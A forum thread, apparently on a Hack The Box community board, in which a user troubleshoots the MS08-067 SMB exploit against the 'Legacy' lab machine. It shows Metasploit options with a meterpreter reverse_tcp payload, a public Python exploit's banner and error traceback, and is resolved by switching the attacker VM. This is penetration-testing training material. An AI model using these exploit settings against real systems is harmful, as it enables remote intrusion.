Legacy - ms08_067 exploit - produces error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)

zombietech · August 3, 2021, 9:18am

Here are the options I am using in metasploit for the ms08_067 exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

RHOSTS 10.129.38.127 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:
’
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST REDACTED yes The listen address (an interface may be specified)
LPORT 8923 yes The listen port

Exploit target:

Id Name

6 Windows XP SP3 English (AlwaysOn NX)

I have tried the python exploit found on github with the same results as shown below:

kali@kali:~/hackthebox/Legacy/ms08_067$ python ms08_067_2018.py 10.129.38.127 7 445
#######################################################################

MS08-067 Exploit

This is a modified verion of Debasis Mohanty’s code (Microsoft Windows Server 2000/2003 - Code Execution (MS08-067) - Windows remote Exploit).

The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi

Mod in 2018 by Andy Acer:

- Added support for selecting a target port at the command line.

It seemed that only 445 was previously supported.

- Changed library calls to correctly establish a NetBIOS session for SMB transport

- Changed shellcode handling to allow for variable length shellcode. Just cut and paste

into this source file.

#######################################################################

Windows XP SP3 English (AlwaysOn NX)

[-]Initiating connection
Exception in thread Thread-1:
Traceback (most recent call last):
File “/usr/lib/python2.7/threading.py”, line 801, in __bootstrap_inner
self.run()
File “ms08_067_2018.py”, line 206, in run
self.__DCEPacket()
File “ms08_067_2018.py”, line 181, in __DCEPacket
self.__trans.connect()
File “/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py”, line 394, in connect
self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
File “/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py”, line 516, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

I have downgraded metasploit to version 5 with the same results.

I have tried numerous payloads and targets.

I have reset the box several times.

I have checked my VMware Kali box configuration and created a new Kali box.

Any help would be greatly appreciated!

dragonista · August 3, 2021, 11:37am

I just did it and it worked as expected.

RHOSTS 10.129.38.127
Where does this IP come from ? I have 10.10.10.4 for Legacy.

zombietech · August 3, 2021, 11:19pm

It’s the IP for a VIP+ server instance of the box.

zombietech · August 5, 2021, 12:28am

I was finally able to get this to work. I made a new box for my attacking machine. The only difference is that I used Parrot OS instead of Kali. I used Parrot OS all through my Associates Degree program for Penetration Testing. I guess I should have never veered from it.